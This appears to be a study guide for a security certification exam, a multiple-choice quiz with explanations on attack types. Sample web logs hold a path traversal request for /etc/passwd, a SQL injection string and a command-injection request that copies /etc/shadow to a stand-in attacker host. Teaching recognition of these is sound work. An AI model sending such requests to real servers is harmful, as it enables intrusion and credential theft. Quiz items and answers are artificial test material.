# Domain 1 Quiz

## Domain 1 Quiz

1. Assign the attack names at right to the descriptions at left. You use each attack name once. Something like "Number 5 matches e", for numbers 1 through 4. On the real exam, this will take the form of pull-down menus by each description.
1. Walking down the street, you get advertising messages from stores you are walking past
2. You hear from friends that contact information they shared only with you seems to be loose on the Internet
4. You receive recorded phone calls that you believe are in Mandarin, a language you don't speak
1. SPIM
2. Bluesnarfing
3. Vishing
4. Bluejacking
1=d, 2=b, 3=a, 4=c

Bluejacking = illicit and unwanted connections, "Bluetooth hijacking", pushing out advertising from the nearby store. I don't know if this is a threat in the real world, but it is in the question pool.

SPIM = Spam over Instant Messaging.

Vishing = like phishing (non-targeted) but over voice, from spoofed caller numbers. I live in West Lafayette, just down the street from Purdue University, with a large number of foreign students. I get frequent calls from a spoofed Chicago number with a recorded Chinese message with background music. I've been told they're borderline scams from immigration law firms.
2. Liz is a security analyst for the IT department of a large university with a correspondingly large number of users. She has been investigating a sophisticated privilege escalation attack. She has determined that the attacker used an ordinary user account with a rather large user ID number. The attack changed that to a very low user ID number, associated with a highly privileged system account. Which of these did the attack utilize?
1. Improper account configuration
2. Memory leak
3. Buffer overflow
4. Integer overflow
5. Race condition
The idea is that the UID was so large that it rolled over MAX_INT (or the maximum integer representable in the programming language on that architecture). The Y2K problem was this in two base-ten digits. With unsigned integers on 32-bit hardware, not paying attention to this problem:
232 - 1 = 4,294,967,295
but:
4,294,967,295 + 1 = 0
Don't know too much! That makes it hard. CompTIA is probably posing their question in a 16-bit world, if not an 8-bit one.
3. You observe the following.
```66.249.79.158 - - [01/Jul/2020:00:00:17 +0000] "GET /travel/uk/ben-nevis/ HTTP/1.1" 200 16745 "-" TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305
54.36.148.211 - - [01/Jul/2020:00:01:30 +0000] "GET /travel/usa/new-york-internet/ HTTP/1.1" 200 80277 "-" - -
174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /../../../etc/passwd HTTP/1.1" 200 25310 "https://www.bing.com/" - -
174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /travel/japan/kamakura/ HTTP/1.1" 200 25310 "https://www.bing.com/" - -
66.102.9.57 - - [01/Jul/2020:00:03:52 +0000] "GET / HTTP/1.1" 200 5050 "-" - -
```
What type of attack has happened?
1. SQL Injection
2. Directory Traversal
3. Buffer Overflow
4. Command Injection
They tried to send the web server up out of the web content area and down into the `/etc` configuration area on a UNIX-family operating system.
4. You observe the following.
```66.249.79.158 - - [01/Jul/2020:00:00:17 +0000] "GET /travel/uk/ben-nevis/ HTTP/1.1" 200 16745 "-" TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305
54.36.148.211 - - [01/Jul/2020:00:01:30 +0000] "GET /travel/usa/new-york-internet/ HTTP/1.1" 200 80277 "-" - -
174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /cgi-bin/?cmd=scp%20/etc/shadow%20hacker@evil.com HTTP/1.1" 200 25310 "https://www.bing.com/" - -
174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /travel/japan/kamakura/ HTTP/1.1" 200 25310 "https://www.bing.com/" - -
66.102.9.57 - - [01/Jul/2020:00:03:52 +0000] "GET / HTTP/1.1" 200 5050 "-" - -
```
What type of attack has happened?
1. SQL Injection
2. Directory Traversal
3. Buffer Overflow
4. Command Injection
Know that `%20` is the ASCII code for a space. Notice the string:
`scp%20/etc/shadow%20hacker@evil.com`
which decodes to:
`scp /etc/shadow hacker@evil.com`
That's the syntax to use `scp` to make an SSH connection as user `hacker` at host `evil.com`, and copy the file `/etc/shadow` (which contains the web server's user password hashes!) to that user's home directory on that remote server.
5. You observe the following.
```66.249.79.158 - - [01/Jul/2020:00:00:17 +0000] "GET /travel/uk/ben-nevis/ HTTP/1.1" 200 16745 "-" TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305
54.36.148.211 - - [01/Jul/2020:00:01:30 +0000] "GET /travel/usa/new-york-internet/ HTTP/1.1" 200 80277 "-" - -
174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /database/'%20OR%201=1%20;-- HTTP/1.1" 200 25310 "https://www.bing.com/" - -
174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /travel/japan/kamakura/ HTTP/1.1" 200 25310 "https://www.bing.com/" - -
66.102.9.57 - - [01/Jul/2020:00:03:52 +0000] "GET / HTTP/1.1" 200 5050 "-" - -
```
What type of attack has happened?
1. SQL Injection
2. Directory Traversal
3. Buffer Overflow
4. Command Injection
They are asking for: `' OR 1=1; --'`
An alternative version of this question is a description, "You notice strange punctuation marks in the log."
6. You are examining web server logs, and you notice some unusually long requests. What type of attack has happened?
1. SQL Injection
2. Directory Traversal
3. Buffer Overflow
4. Command Injection
They hoped to send too much data to a privileged service that did not check input length to make sure it had enough memory to store the input.
7. Last week Ann, a staff member in the Human Resources department, did a Google search and clicked on one of the links on the first page of results. That took her to a strange page. She went back, realized she had misspelled her search, corrected that, and found what she needed. Today she logged on to her bank site from work and noticed some mysterious transfers from her account to a bank in Eastern Europe. What has happened?
1. Clickjacking
2. Ransomware
3. Crimeware
4. Extortionware
5. Spyware
The tipoff is transfers out of her bank account, which CompTIA associates with "crimeware". Clickjacking could have to do with how it happened, but the question asks you to name the event. Ransomware would be the answer if she was told to pay to recover her data from deletion or encryption, extortionware if she was told to pay to avoid the exposure of embarrassing information (which might be untrue), spyware would have to do with sensitive information being stolen. If you say "Yes, but if there was spyware that could lead to stealing her banking credentials, and that could lead to the transfers", you are building a more complicated answer.
8. Shonda, a security auditor at a financial institution, discovered an advanced attack that had stolen and exfiltrated a great deal of sensitive information. She searched a database for details of the attack, but found nothing. After a great deal of investigation and research, she discovered that it seems to be a new vulnerability with no available patch, and she implemented a workaround. What did she discover?
1. False-positive event
2. False-negative event
3. Zero-day event
4. IDS failure event
5. IPS failure event
"In a database" is CompTIA's allusion to Mitre's CVE list.
9. Shari, a network engineer at a major health care facility, has determined that when the head of the Radiology department authenticated to the medical image database server, the encrypted traffic was captured by an intruder. That intruder later transmitted that information again to access the database as the highly privileged account. What type of attack is this?
1. APT
2. Rootkit
3. Rogue AP
4. Replay
Lots of clutter and distraction around a simple story: Someone authenticated, the attacker recorded and retransmitted (replayed) it to get in. On the actual CompTIA exam they might include the head of Radiology's name, what category of images she was looking at, and so on.
10. Mehmet, the database administrator, has discovered that a user has accidentally deleted an entire database table. What went wrong?
1. Misconfigured account
2. Untrained user
4. Memory leak
The user shouldn't have been able to destroy the database table.
11. News reports tell of a major DDoS against a famous company. Meanwhile, you receive a letter from your ISP saying that your home computer is sending malicious Linux-sourced traffic. But you don't own a Linux computer, in fact you don't own any computer. Your home electronics are limited to a smart TV with a Blu-ray player and a DVR. What has happened?
1. Nothing, your ISP is wrong
2. RAT
3. BOT
4. Trojan
Smart TVs, Blu-ray players, and DVRs all run Linux, although their owners rarely known this. They're based on rather old versions, usually with a 2.2.26 kernel from 2004, often with well-known default passwords, and with no way to patch or reconfigure it. It has become a 'bot or zombie in a DDoS attack. Yes, the perpetrator is controlling it, but not doing any RAT-like abuse (collecting data from your house, interacting with you), and they didn't have to tempt you with a Trojan to get in. My guess would be that your router has PnP or Plug-and-Play turned on, and they connected in — the Mirai botnet did exactly this, with huge numbers of IoT devices running Telnet service with a known default password. Yes, the premise of this question seems strange, you get a letter at home, but questions very much like this are in the pool. I got two or three questions set at home, one very similar to this.
12. Jim is a software developer. Tina, his manager, has asked him to list software design and development security issues to share with new team members. Which of these is the reason for most software vulnerabilities?
1. Improper input handling
3. Support beyond end-of-life
4. Default configurations
Everything but the last sentence is distraction, to waste your time and maybe confuse you. CompTIA does a LOT of this!

User input may be hostile, so always assume that it is. It must be validated and either rejected or corrected if of inappropriate size, format, syntax, semantics, etc.
13. Inga, a security analyst at a government agency, is inspecting the components of her operating system. She had identified what looks like a compatibility driver, but she suspects that it is being used by malware to monitor keystrokes and steal other data. If so, what malware technique has she discovered?
2. Shimming
3. Driver refactoring
4. Data flow manipulating
Driver shimming can be legitimately used to make an older 32-bit driver compatible with a 64-bit operating system. However, malicious software can masquerade as a legitimate shim.

This is an example of CompTIA's focus on memorizing sometimes arbitrary terminology. In the real world there may be other, equally valid, terms. But to get the point on the exam, you have to pick CompTIA's preferred terminology.
14. Alexandra is a White Hat penetration tester doing a Black Box attack. She is using software to automatically submit queries to the search form on a web page. What is she doing?
1. Active reconnaissance
2. Passive reconnaissance
3. Open-source analysis
4. Pivoting
It is active, not passive, because her software is sending inputs and interacting with the web server. It isn't open-source because Black Box implies the opposite. Pivoting means breaking into one system, using it as a foothold to attack other systems inside.
15. Jermain is fielding help desk reports of WLAN clients repeatedly dissociating from their WAPs, and having to reassociate. What may be responsible? Select two
1. Bluesnarfing
2. Jamming
3. War driving
4. Channel conflicts
5. SSID loss
Jamming would be intentional, either that or accidental channel conflicts could cause enough signal interferance to knock the clients off the WLAN.
16. Vladimir has written some malicious software that adds unneeded loops, NOPs, and other ineffectual code every time it is executed or spread to a new platform. What technique is he using?
1. Refactoring
2. Shimming
4. Modifying
It literally modifies the code, but "refactoring" is what you must select to get the point. The changes make automated detection much more difficult.
17. Peter is a security analyst at a bank. The bank wants to extend its use of an outdated operating system, as the alternative would require replacing all their existing automated teller machines built into storefronts and standalone brick kiosks. What problem will they have to solve?
1. Embedded systems
2. EOL
3. IoT
4. Input validation
5. Error handling
End of Life. Many deployed ATMs still run Windows XP. Embedded and IoT become more tempting with the emphasis on the ATMs being built into enclosures. Proper and complete input validation and error handling are, of course, very important, but the question is about things they haven't yet done.
18. George's manager needs to give a presentation to the board of directors, telling them about the most critical threat to the organization. What should George make sure is highlighted?
1. Asset management
2. Insider threat
3. Social media
4. Baseline deviations
5. Performance
6. Unauthorized software
We have technical controls for everything else, and the insider threat is always the most threatening.
19. Why might you use fuzzing? Select two.
1. You need to detect logical errors
2. You don't have the source code
3. You have the source code
4. You have the source code, but you signed a non-disclosure agreement
5. You're uncertain of the purpose of the software